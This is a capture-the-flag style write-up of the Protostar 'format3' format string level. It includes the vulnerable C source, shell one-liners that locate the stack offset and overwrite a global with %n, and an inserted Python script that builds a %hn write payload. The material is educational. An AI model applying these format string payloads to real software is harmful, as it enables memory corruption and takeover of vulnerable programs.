Protostar Format3 – Writeup

I love testing format string vulnerabilities because they are fun. Let’s get started.

Description

This level advances from format2 and shows how to write more than 1 or 2 bytes of memory to the process. This also teaches you to carefully control what data is being written to the process memory.

Format3.c

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void printbuffer(char *string)
{
  printf(string);   /* the bug: user input is used as the format string */
}

void vuln()
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);

  printbuffer(buffer);
  
  if(target == 0x01025544) {
      printf("you have modified the target :)\n");
  } else {
      printf("target is %08x :(\n", target);
  }
}

int main(int argc, char **argv)
{
  vuln();
}

In this task we need to set the global target variable to 0x01025544.

[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "%08x"')) | ./format3
00000000
target is 00000000 :(

Test with the input AAAA followed by a run of %08x to see where our buffer lands among printf's arguments:

[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "AAAA"+"%08x."*100')) | ./format3
AAAA00000000.bffff5d0.b7fd7ff4.00000000.00000000.bffff7d8.0804849d.bffff5d0.00000200.b7fd8420.bffff614.41414141.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.
target is 00000000 :(

41414141 shows up at position 12, so the start of our buffer is printf's 12th argument 😀.

[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "AAAA"+"%12$08x."')) | ./format3
AAAA41414141.
target is 00000000 :(

Pretty good! To change the value we need the address of the target variable, which objdump can give us:

[email protected]:/opt/protostar/bin$ objdump -t ./format3 | grep target
080496f4 g     O .bss	00000004              target

Exploit it: put the address of target at the start of the buffer (argument 12) and use %12$n so printf writes the number of characters printed so far into it.

[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "\xf4\x96\x04\x08"+"%12$08n"')) | ./format3
��
target is 00000004 :(

Target is now 00000004: %n stores the number of characters printed so far, and at that point the only output was the four address bytes. We need the count to reach 0x01025544 instead, so convert that to decimal with the shell's let builtin:

[email protected]:/opt/protostar/bin$ let x=0x01025544; echo $x;
16930116

The four address bytes are already four characters of output, so the padding needed is 16930116 - 4 = 16930112. A %u with that field width prints the next stack word as an unsigned integer padded out to 16930112 characters, so the counter stands at exactly 0x01025544 when %12$n fires. (Mixing a plain %u with a positional %12$n is not guaranteed by the C standard, but glibc handles it, and glibc ignores the 08 width on the %n.)
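That padding arithmetic is the whole trick: every byte printf emits before the %n bumps the count it stores. A single %n scales badly for a 32-bit value, though, so the usual practice (and what the level description hints at with "more than 1 or 2 bytes") is to split the write into two 16-bit halves with %hn at target and target+2, which keeps the output to a few tens of kilobytes instead of 16 MB. The Python 3 script below is an added example, not part of the original writeup or the Protostar distribution, that builds such a payload from the numbers found above: the address 0x080496f4 from objdump, argument slot 12 from the %12$08x probe, and the 512-byte fgets buffer. It pads with %Nc rather than %u, because %Nc emits exactly N bytes whatever stack word it happens to consume, and, like the writeup's own one-liner, it mixes a plain conversion with positional %k$ arguments, which glibc accepts. The simulate_printf helper is a deliberately minimal model of only those two conversions, so the payload can be sanity-checked offline; it is not a general printf.

```python
import struct
import sys

# Numbers taken from the writeup above.
TARGET_ADDR = 0x080496f4   # objdump -t ./format3 | grep target
WANTED      = 0x01025544   # value that vuln() compares target against
ARG_OFFSET  = 12           # %12$08x echoed 41414141, so our buffer is argument 12
BUF_SIZE    = 512          # fgets(buffer, sizeof(buffer), stdin)


def build_hn_payload(addr, value, arg_offset):
    """Format string that writes the 32-bit `value` to `addr` with two
    16-bit %hn stores (at addr and addr+2) instead of one huge %n.

    Layout: <addrA><addrB> %<padA>c %<k>$hn %<padB>c %<k+1>$hn
    where k is the argument slot holding the first address.
    """
    halves = [(addr, value & 0xffff), (addr + 2, (value >> 16) & 0xffff)]
    # The count is stored mod 2**16, so either order is correct;
    # doing the smaller half first just keeps the padding short.
    halves.sort(key=lambda h: h[1])
    slot = {a: arg_offset + n for n, (a, _) in enumerate(halves)}

    payload = b"".join(struct.pack("<I", a) for a, _ in halves)
    written = len(payload)               # the 8 address bytes are output too
    for a, want in halves:
        need = (want - written) % 0x10000
        if need:
            # %Nc emits exactly N bytes whatever stack word it consumes;
            # %Nu would emit max(N, digits of the value) and could overshoot.
            payload += b"%%%dc" % need
            written += need
        payload += b"%%%d$hn" % slot[a]
    return payload


def fits_fgets(payload, buf_size=BUF_SIZE):
    """fgets keeps at most buf_size-1 bytes and stops at a newline, and a NUL
    byte would end printf's format early: reject a payload either would cut."""
    return (len(payload) < buf_size
            and b"\n" not in payload
            and b"\x00" not in payload)


def stack_for(payload, arg_offset):
    """Model the stack printf sees: slots 1..arg_offset-1 hold junk, then the
    buffer itself, split into 4-byte little-endian words."""
    words = [b"\x00" * 4] * (arg_offset - 1)
    body = payload + b"\x00" * (-len(payload) % 4)
    return words + [body[i:i + 4] for i in range(0, len(body), 4)]


def simulate_printf(fmt, stack_words):
    """Minimal model of printf for the two conversions we emit (%Nc, %k$hn).
    Returns (bytes_written, {addr: 16-bit value stored}) so a payload can be
    checked offline before it is fed to the real binary."""
    mem, count, i = {}, 0, 0
    while i < len(fmt):
        if fmt[i:i + 1] != b"%":
            count += 1                   # literal byte, including the addresses
            i += 1
            continue
        j = i + 1
        while fmt[j:j + 1].isdigit():
            j += 1
        num = int(fmt[i + 1:j])
        if fmt[j:j + 1] == b"c":         # %Nc: exactly N bytes of output
            count += max(num, 1)
            i = j + 1
        elif fmt[j:j + 3] == b"$hn":     # %k$hn: store low 16 bits of count
            where = struct.unpack("<I", stack_words[num - 1])[0]
            mem[where] = count & 0xffff
            i = j + 3
        else:
            raise ValueError("unsupported conversion in %r" % fmt[i:j + 3])
    return count, mem


def check_payload(payload, addr, value, arg_offset):
    """True when the simulated %hn stores reassemble to `value` at `addr`."""
    _, mem = simulate_printf(payload, stack_for(payload, arg_offset))
    got = mem.get(addr, 0) | (mem.get(addr + 2, 0) << 16)
    return got == value


if __name__ == "__main__":
    p = build_hn_payload(TARGET_ADDR, WANTED, ARG_OFFSET)
    assert fits_fgets(p) and check_payload(p, TARGET_ADDR, WANTED, ARG_OFFSET)
    sys.stdout.buffer.write(p)           # python3 fmt3.py | ./format3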

[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "\xf4\x96\x04\x08"+"%16930112u"+"%12$08n"')) | ./format3

Bango! We got it! After roughly 16 MB of padding (not shown here) the check in vuln() passes. Thanks for reading. Happy Hacking.